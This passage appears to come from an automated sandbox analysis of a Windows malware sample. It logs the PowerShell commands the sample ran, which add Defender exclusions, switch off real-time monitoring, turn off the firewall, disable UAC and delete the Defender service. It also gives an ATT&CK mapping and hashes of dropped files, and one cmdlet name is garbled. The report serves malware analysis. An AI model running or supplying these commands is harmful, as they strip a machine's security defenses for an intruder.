- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath E:\
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess explorer.exe
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess kernel32.dll
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess aspnet_compiler.exe
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess CasPol.exe
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess csc.exe
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess ilasm.exe
1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess InstallUtil.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess Calc.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess jsc.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess powershell.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess mshta.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:5556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess cmd.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionProcess wscript.exe
1⤵
- Process spawned unexpected child process
PID:5616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionIpAddress 127.0.0.1
1⤵
- Process spawned unexpected child process
PID:660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ThreatIDDefaultAction_Actions 6
1⤵
- Process spawned unexpected child process
PID:5648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -AttackSurfaceReductionRules_Ids 0
1⤵
- Process spawned unexpected child process
PID:5888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
1⤵
- Process spawned unexpected child process
PID:6072

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
1⤵
- Process spawned unexpected child process
PID:6836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell New-Ipublicroperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
1⤵
- Process spawned unexpected child process
PID:7048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -EnableControlledFolderAccess Disabled
1⤵
- Process spawned unexpected child process
PID:6472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -PUAProtection disable
1⤵
- Process spawned unexpected child process
PID:6280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
1⤵
- Process spawned unexpected child process
PID:5784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:6688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:5368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:6204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ScanScheduleDay 8
1⤵
- Process spawned unexpected child process
PID:5156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell netsh advfirewall set allprofiles state off
1⤵
- Process spawned unexpected child process
PID:6608

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
2⤵
PID:6320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Stop-Service -Name WinDefend -Confirm:$false -Force
1⤵
- Process spawned unexpected child process
PID:6416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-Service -Name WinDefend -StartupType Disabled
1⤵
- Process spawned unexpected child process
PID:5668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell sc delete windefend
1⤵
- Process spawned unexpected child process
PID:5052

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\aspnet_compiler.exe.log
MD5
6b5a2c06d34c86bcc8aacc3a739fd362

SHA1
54fc90eaa12ba9251414e8dac83fdae08819ee42

SHA256
1492fc3847a36be51e64ca15fb12b6cc177891495f6409cfe678d88cb2f59b68

SHA512
228099efd50e8017eb9e320459bba6c4d40af8c92c1761b58ce35424f7f1bc1c3d4f4d808515ed27570f0e50bdf8945a9f8264806f92c30d2a70a9aa85c444ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
ba7132a48dcfdcc06458f0e2f27d23a5

SHA1
5f6bd3113463883ac12a81a82d598c5f1273fab3

SHA256
d21ea528a0415d11060fdf85f707a77c2f957d36f61f719ce66ed10a4405e2f6

SHA512
90f8ee05d646dc299be24672033f73fade3996bb8d9493d440d7fc12e030389c2d0e64cc6a04fb6062751c599fcfb6963eb6458234db953c7328ab3c8c986b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
cd906947a336be88d5ee58425ab18d37

SHA1
278c37be83d5f8d5c6efa0bee1beb5d62d13447b

SHA256
46d47bf648aa4d9136b2f1965403c10339d26c0264664e7fc249335ef7b3c5f9

SHA512
90514222c3d3b968e40066cf4ddec440c43ebd6a03209ede6fe8975b497a59742bcc5d3fa928775bdb13dd3a82fd2b512272a0d923f05249410d51f2f7760caf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
cd906947a336be88d5ee58425ab18d37

SHA1
278c37be83d5f8d5c6efa0bee1beb5d62d13447b

SHA256
46d47bf648aa4d9136b2f1965403c10339d26c0264664e7fc249335ef7b3c5f9

SHA512
90514222c3d3b968e40066cf4ddec440c43ebd6a03209ede6fe8975b497a59742bcc5d3fa928775bdb13dd3a82fd2b512272a0d923f05249410d51f2f7760caf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
45a396d997120766f30ec4a75ee977a5

SHA1
085db01b16a2a23bb9a0c5cfa3d6265b26b09c43

SHA256
1ea79b34a56361a56f2e7c794c3be99fcccc2d652fb8a4a3ef285b447ae9946e

SHA512
5093e1a6ba02f4a8dcf1f4a3a0aba6a6b4fa1fac463872d1df6df94c9913dcdce4e16ed8091b72cb858f1a7c252bea73a638cb9c8e40676c680b709f040bd09b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c6b58f7e052d27d714d0772faafd06c8

SHA1
fde73da0ed420d6efb570eb98ce42bb9cb66e627

SHA256
f6c2c718ae18cfa67c98035347f3b63aa3e51fadcd0a549fe3344414ceba547e

SHA512
61fdb2a6557cc72e4f88a24f0e68c85f1c802e41cc0bf72f6375a2ce3118d2846b001f6b323fea17147af19a804814beebc9e0cc14fd0d0967de5228c9eeeda1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c6b58f7e052d27d714d0772faafd06c8

SHA1
fde73da0ed420d6efb570eb98ce42bb9cb66e627

SHA256
f6c2c718ae18cfa67c98035347f3b63aa3e51fadcd0a549fe3344414ceba547e

SHA512
61fdb2a6557cc72e4f88a24f0e68c85f1c802e41cc0bf72f6375a2ce3118d2846b001f6b323fea17147af19a804814beebc9e0cc14fd0d0967de5228c9eeeda1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e0a522d921af0a58d8d90e3f99420004

SHA1
cf2a07d69793530354076c18fe18b690a3186fd2

SHA256
66e23a78b327ef936343ce0334c6489469997af5db8bbd43029c0fdc309fb751

SHA512
684ea2d938603a2dae6d672ab4c7b2bdacefb0a1c140838e23e60820250ee3cdbabd6059ffa3b27d3f3e529eb4a096189cc50d0218311b11de3e794cbebaf4ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
b28d99819c1b0cf5e48a81b28a8f18eb

SHA1
d6924b7a7e5db1133db5401604395be3a553f343

SHA256
3fb97cac6b4d27acb6722b71da68f17c73f58965d035938ee4e2734131b1e1a2

SHA512
afcbda77f31d1c0e9d835f1cde38288de8800b08a78069607df42252726a0b201cfa3855bde671ae929e9d87fa1602247eca914413e622f1c7156813ea7ba53e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
10d0c75e3090422ed7b736711493e3cd

SHA1
a68951ffb03a223219268a54fda0231c7acfa775

SHA256
4071c169f556a403df89af724fdc03dbc20dbe94dbbcc38a18bb6814285dd694

SHA512
8edba9d6a1be6e24117749de4c780d47ad0c08f1081777d2589ff8b967aad21688ac769c6332263b3ec8c6a65507bbfb487f7daa121efdbef858f7cae900db39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
10d0c75e3090422ed7b736711493e3cd

SHA1
a68951ffb03a223219268a54fda0231c7acfa775

SHA256
4071c169f556a403df89af724fdc03dbc20dbe94dbbcc38a18bb6814285dd694

SHA512
8edba9d6a1be6e24117749de4c780d47ad0c08f1081777d2589ff8b967aad21688ac769c6332263b3ec8c6a65507bbfb487f7daa121efdbef858f7cae900db39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
10d0c75e3090422ed7b736711493e3cd

SHA1
a68951ffb03a223219268a54fda0231c7acfa775

SHA256
4071c169f556a403df89af724fdc03dbc20dbe94dbbcc38a18bb6814285dd694

SHA512
8edba9d6a1be6e24117749de4c780d47ad0c08f1081777d2589ff8b967aad21688ac769c6332263b3ec8c6a65507bbfb487f7daa121efdbef858f7cae900db39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6898ac8552216a841d28a69adf2297f8

SHA1
4848778fa69f4dde49684943333717c4ec3c958e

SHA256
7514d13d09902557293b34dd6b4d62b9290b84454be8d0e2259c7faa1afa2ea4

SHA512
deeebcfa880897e6c66bbdf5a10de9b81efb694b00c775e8488b737b94071480b2577a1aad364ef3a05a7fbce2ae6fcec3f4b8ba2124994eb4f34276df86cf09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
aa0cd7b0c3f4fbc170af5ef7d265d627

SHA1
1ef60219653c761c1ca2acbbd8d4b71e19d1f858

SHA256
03f070649052eccd6961c9121e199268feac6e8013c66253e0e97ffdb5471d19

SHA512
0be838e46e0d9eb3788881f4bf955262646f2a47e19e600d34b12e53e5c94d3ca7486c8820d8bb33099f834c525d6e93aa3edceab507ace507ef915809c0753c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
fa98b220a156d3bc44ba02188075194c

SHA1
b112fcd938c46c573a9bf8135a4027f0151d35b7

SHA256
54abea45a1c570698a244f634bc0dbc81212d98c2f08da82a7416831882f01f9

SHA512
8f1564332654c64ba74699b7bc7e6ce86dcb3cb9201777f2a6b5b5d4f1a1cb2a9dfdde83453e9c95dffbf2d955f2ee63aaebce65ba0b24271def0271db3e34dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
be4504e66d4842a861eac56a9a77a53b

SHA1
a1f44d0720631a1739fb628da220dead1a9bda76

SHA256
db32587c768e28abceb66718169949082508a6a376057f416945d6100112df06

SHA512
e5689d1997c7e84f0d9132119e895019bda23ab58a5c821ea0b050080db37de4d136f6e43bc4e81c5ca1b29424947b5989973b0928706cd7acfac28e00c4f086

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
be4504e66d4842a861eac56a9a77a53b

SHA1
a1f44d0720631a1739fb628da220dead1a9bda76

SHA256
db32587c768e28abceb66718169949082508a6a376057f416945d6100112df06

SHA512
e5689d1997c7e84f0d9132119e895019bda23ab58a5c821ea0b050080db37de4d136f6e43bc4e81c5ca1b29424947b5989973b0928706cd7acfac28e00c4f086

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
dca62d90e916ab12e5a4bf59fb0e442b

SHA1
cc87bb87d0f8fcb2baecce92fd0176fc666394d4

SHA256
9b29863821d754a04bf6cdd37d847a8587f12ce3944fe80b7bf30cd8af5b90a4

SHA512
2950baa955f7fe76c7cac4a7a8941039d4551ee291d2f710bc262107d90e0ed176ab5de29388ba113f99f466d0f45629ff78bd700510c4edc48917951e781e87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9900839701af74ca62e05c56d4652b44

SHA1
bf431113110458bf041ff9be1730cb82765fe73e

SHA256
dec319a57f326f259087275c1b9e0318a0d8f8c1f64a34b6e7de0f6d5b31e749

SHA512
4020dd177164d9775fe2575e07a80a4c9f1533ad2b3fa7b7e55b92dab0b69959157cfe5413677a97c5527c5dda43fd0ec6818830475fb68a807d94666c3c2921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9900839701af74ca62e05c56d4652b44

SHA1
bf431113110458bf041ff9be1730cb82765fe73e

SHA256
dec319a57f326f259087275c1b9e0318a0d8f8c1f64a34b6e7de0f6d5b31e749

SHA512
4020dd177164d9775fe2575e07a80a4c9f1533ad2b3fa7b7e55b92dab0b69959157cfe5413677a97c5527c5dda43fd0ec6818830475fb68a807d94666c3c2921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
82f8451186ed87660d68ee02c806114a

SHA1
df97e2b9b964313f551a219db2a80079a0e322b2

SHA256
ac3e17d3ac1c39fa301ef695c3adb9301c7a69a5d9ae30273be3cf91369de6ae

SHA512
5ab1b858948ee8dde042f39e9d941bd507ce5b7245aa6eb3214d85ba20d8c4533059a4d0625333ccf917b3615deafef5f744d3370f06f3d85ae34079f2075eb3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
68c993be63e56ac7e834acb3b7bd2baa

SHA1
1a981d0d1f7268cf15dc6846aef2b20d7baee52d

SHA256
9f503fc9bbe5dcea5fb5351cb601f3b075322bdcdbf2ab90da34f825590e37cc

SHA512
4d51a8ffc39d896aa324e5c35e0fa817a06a54cc1d579ac134345d194b86fc7274ee6b061f56fdb909e7b63b590610afb6f1228159d8c5726c225a20c0120da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
de6e4df4f55f3c3e1739fed10c40bf71

SHA1
2ad52943a5f848e77b60dbed5eecaa961c9d29c1

SHA256
a75d556b6541f5fd5ec08caef54cae716b1c877335735dfe8ad745581d822028

SHA512
23309548dce9fc0eca0ec94efe800b65c7633c0dcaa498d0be34963be8c89d747ab32ed0513448f7cbacc2b20125d23d2ee78d2878472f14fcf97a8b021f6f7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f32f123f92858786bba728811c112b68

SHA1
b011c97d9a5089b95d98655ad5a34c712fed47ac

SHA256
41a7091528e8e9bbd99ef0cb6a3d167757c99201e3e10f18e6f190eb742ffc94

SHA512
af199d19811b030d24c9a055a8318eae6e11df1e56e66954466c4f120daf3e827c08fdf0620b289d0ae8b7fc595bd3866e018936bce74c24a7b9f9624da9d23e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e13cc658ae08071dc03e14a5ede5621e

SHA1
843b997c4d5d65e322bee7d6d656fe7eee3231ca

SHA256
025850075ae9de7e2b766befd2da344edc59d1d96c3a2b986b61c7aec668fd41

SHA512
b3c8d3067c86303c3cf5b13ce2ea92caa022f2daf15bb486737cd7fc61b3c3fb2377afe5a9934768023fbda676b5a5a2596eaa9784bd82c0c4ce36ab07f1209f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e13cc658ae08071dc03e14a5ede5621e

SHA1
843b997c4d5d65e322bee7d6d656fe7eee3231ca

SHA256
025850075ae9de7e2b766befd2da344edc59d1d96c3a2b986b61c7aec668fd41

SHA512
b3c8d3067c86303c3cf5b13ce2ea92caa022f2daf15bb486737cd7fc61b3c3fb2377afe5a9934768023fbda676b5a5a2596eaa9784bd82c0c4ce36ab07f1209f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5c18d42f270c9c83d2ee4c28690f18f6

SHA1
82580567be866def692e35dd094b264228466565

SHA256
2668f5fcf6d89d01f6767aff713b0068e5b5f525844bd70052714fc282c6c543

SHA512
31a46c115e62b0aeddf9f5b75b850643d369228309af9591cb6198c893902e15d4e8e6210c5f3b4227fe2d769994f87e244aebb6695c8b7fa868e585ced3d9ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5c18d42f270c9c83d2ee4c28690f18f6

SHA1
82580567be866def692e35dd094b264228466565

SHA256
2668f5fcf6d89d01f6767aff713b0068e5b5f525844bd70052714fc282c6c543

SHA512
31a46c115e62b0aeddf9f5b75b850643d369228309af9591cb6198c893902e15d4e8e6210c5f3b4227fe2d769994f87e244aebb6695c8b7fa868e585ced3d9ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
27381b81e945e58757053ad35ced26c2

SHA1
93a6a274773189f5e0f163d3f233008a30d34e85

SHA256
0a00777c41b5c0beef0b3c70f4112fc46f0191b0abcb6402a35a7ee65b377fbc

SHA512
f885c880641ea72428cd50afcbc2ca09d8d8ebf3bec1619705d438861734b0c9d38e79a53fb51218d6cecca929d507297091f1fd271494c60ad14e7e91ee5808

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c068e837fae6eedac3a1d3bc5460b771

SHA1
db42893b7ea6c1e56554871153d46a1f15f00e82

SHA256
4aa76be1adf7879466fc5764ede064078578a29aaf18d5769e8cdcea9a6e4a0b

SHA512
192cb8c1ba76af45b5287acdf9a5b62dedba0ce00cbda2fde6cc6c5a939dbd56d01187acb481c7310401e37e48844fc580611d6e935dfeb5bfaee6755e6f2596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6781698298a3b6bfe0e5b67e31399e07

SHA1
1e9c6d2cce814f75bbe05bdd48bc52cc3203232b

SHA256
431c6b915d8015058e27359e2ab6ca3c2ef11896b42443330d3728ede2ce42bf

SHA512
cbb50e35f4aec25394551441144f04e7203b7d6126ab6fa4daade80988b85a9422367b393d9102491a88baa4d1af4fc6f0d2ac3e3d4dfc8e7e08bf2e719fd1d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4946627163d3c93d0f6bb87d4379a81c

SHA1
4abc0d5086a872aa0e6c6608a0dfd3adf2f538a5

SHA256
a88f24c6c5b3291fcd88aee93114b81b4058fb70cdd315256cc72f6f017d1035

SHA512
2aab7532d84449ef04a17ff6e48bc6cf96e32cb6749ec2696219d49eb4573cc23c4e82ecb00cfbf28add60390f0fcd35eb8c63b9d9a23b58614353d1a6e44357

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
928458e30f358309abc2da069d3c80e9

SHA1
685f81c2c34b336e0d6ec675b093adbecb89fc4c

SHA256
328e87a14373d70b3a2ede091b4f73a16ac7e4cecdd4cd67b9d69fe9ce80e1e3

SHA512
83d5df7e791c9f7b8f02fb45525c150974098b30ac438d9a4ccaa6051d7d99e28f92f698e3473566bb4fc5326ba9f4e5c0369e98f693ef12fb73652086f54dfc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
54fa1a3bc00d7b40ea2fbefbdd2d3b0c

SHA1
4a7af91d76620d572e73da0cde904b9299770483

SHA256
8d0f50fcd94c6d3ccb217f18e7d7a6a5681ed6a011b434ad65986e35c8490bff

SHA512
2d78820a8838c5c1b7680ac4d775039a74589032664cf588e89d9eb8e30c0925cbc21f6ffa741194eff3d174c1d997037dd0241490bb889015335b7849bdf3c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
54fa1a3bc00d7b40ea2fbefbdd2d3b0c

SHA1
4a7af91d76620d572e73da0cde904b9299770483

SHA256
8d0f50fcd94c6d3ccb217f18e7d7a6a5681ed6a011b434ad65986e35c8490bff

SHA512
2d78820a8838c5c1b7680ac4d775039a74589032664cf588e89d9eb8e30c0925cbc21f6ffa741194eff3d174c1d997037dd0241490bb889015335b7849bdf3c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1d07dd0e96e0022939b91b1b9359c7e4

SHA1
2e3bb2f4eca7caae3825beed4ef4080ebef59a8a

SHA256
f808f49883595a50916dbcd2b8cd14090eeb70032dd821af04d495995bc85cec

SHA512
8b9a74cdec7bd496ab5f02db660d3bd111c3581ea72d15dfee92efbe70c52f9fa1b4ea309fc81bb603178c102921d2369ff3c7f42daac6a4dfae57fbde188946

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1d07dd0e96e0022939b91b1b9359c7e4

SHA1
2e3bb2f4eca7caae3825beed4ef4080ebef59a8a

SHA256
f808f49883595a50916dbcd2b8cd14090eeb70032dd821af04d495995bc85cec

SHA512
8b9a74cdec7bd496ab5f02db660d3bd111c3581ea72d15dfee92efbe70c52f9fa1b4ea309fc81bb603178c102921d2369ff3c7f42daac6a4dfae57fbde188946

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ef9e1159ccae3445301ef228a7e93e76

SHA1
facdb2b3431e11756cc3b67c9ce96b2e9e8f68ae

SHA256
ea8c31c426714b440f413618837d07d95a91d19ff5ad1e4486cf753d761a7439

SHA512
85d7e512201fc39844f0efce19ac07d2c59c88634a5de3217f029f22494b7df30eb1c72256764011ce0c70b83a8953cb31d95577c14ec14abd1beb329b0b8fa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ef9e1159ccae3445301ef228a7e93e76

SHA1
facdb2b3431e11756cc3b67c9ce96b2e9e8f68ae

SHA256
ea8c31c426714b440f413618837d07d95a91d19ff5ad1e4486cf753d761a7439

SHA512
85d7e512201fc39844f0efce19ac07d2c59c88634a5de3217f029f22494b7df30eb1c72256764011ce0c70b83a8953cb31d95577c14ec14abd1beb329b0b8fa2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0272446cbdfa074dbc4fc017663131c7

SHA1
9fb89c24e835a8aacea199b9b9aedd4d4c078f6f

SHA256
14ae1cfa614b5b80eea74aec7c723119ecc30c9ccb93de71bbc0025f2b3a857e

SHA512
27c4c20de97deb77a2390f32e85ac98b8b917de9123197a3d6ff79b2690080ef99734c1046cddc1cfe6931574c1293c17ed47c04c1b662bbf89fbcf2e93d9f74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bffa332c637b72ed0b0092b87a551543

SHA1
32771ac35f3b038af560a455da53484be8b7d74d

SHA256
5c6e6c4e5d9df796f76f47312b0d38a65441335e3b0e235693fbd96b2b1d4f4d

SHA512
2897f76ddcd2802cb01af691c73defba1552e4f4c9b8d16b0ebb5f4d301f0454af1f458b70230808d06dcd8c31c04ee4c72705f9a5a34dda794bb195e2d8d9d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1f1f6b5ad716100edfacc1c996d44537

SHA1
10a60dfbd6de8f85d991727a8600eba2f6ade98b

SHA256
0d0dbef255a211ac53d824066479b90a68b804c46510d2fa6a60b478471da84c

SHA512
3e7e69a3c91c2bbaab7fa44d5eb51d2abdf0863a6e69e0e0c974ccb86a9a24c98afa1c2e9e75dd547e5ee3b667a981cf7cb10959c4a339be377b7bca11a8d1d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMSTP.inf
MD5
f1b6643a299217c3a9c3a152b763b337

SHA1
9e2fdbafff5f15d874d709dfc97255f2486a4c4c

SHA256
d4bf35959e2cd4aa7930f50e1ecddac70e5a29771263563bd5bc34c81ce5855e

SHA512
286634cf608a21c33a0a6dbe3c54e7b411c49bcc1929d98cd27c4b487fe8709a4a5a94c2a670dcb0ca7ecc02e33e0a78f37414211c0eec6115f8cee631bb36ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAA26.tmp
MD5
a8307fdcddb1ac8b6a550d3ec563f541

SHA1
7311773e02c5476c9379b7843b56ea3cee0f58ab

SHA256
694714ac4c21e883d63f3582dd17349f3e372e14e4c254da9544c802c8b32269

SHA512
af8ef8e1a0840c31dd1539d20cb7f6cb32b0d0839f3e2c3806c94917571d65a57dff32a9798c4a72593ce293e0979f5ae1c2d9435175e720288e2052e3a89d41

Download Submit
C:\Users\Admin\AppData\Local\Temp\e5f5wenr\e5f5wenr.dll
MD5
38325b887fcf65b06efe85b785d6ab0e

SHA1
bb912d351407c52538a0f148dcb35906af0e038e

SHA256
4db364a461d3be5502092737f8be9437aff5ef45bf9cebf95cffb9a109aa4621

SHA512
5a5d718028ed4451e77cb0395bd0c8b23e8318410e755d85bae72e361337d481615b9d8d230957a6d30fef2b87c4a947088332dd290013bcceecc23cb16f7c19

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
MD5
30a1e8d4c1d5393b551df0bd30231068

SHA1
acd37b0c5e64b705e6184a184d11fa7856997cb3

SHA256
43bc7531c86a8ae4933a6f1d36032a42ca7ef4afb37d25a6c8637712c01176a5

SHA512
fd7bd945b17e45317e82de7b5110078fc76db4652d63b83d51b183c1b6ca4f42bf22d1415f070274d33865cbc01466f89221cbb25496455512b7041b6f2b889c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.lnk
MD5
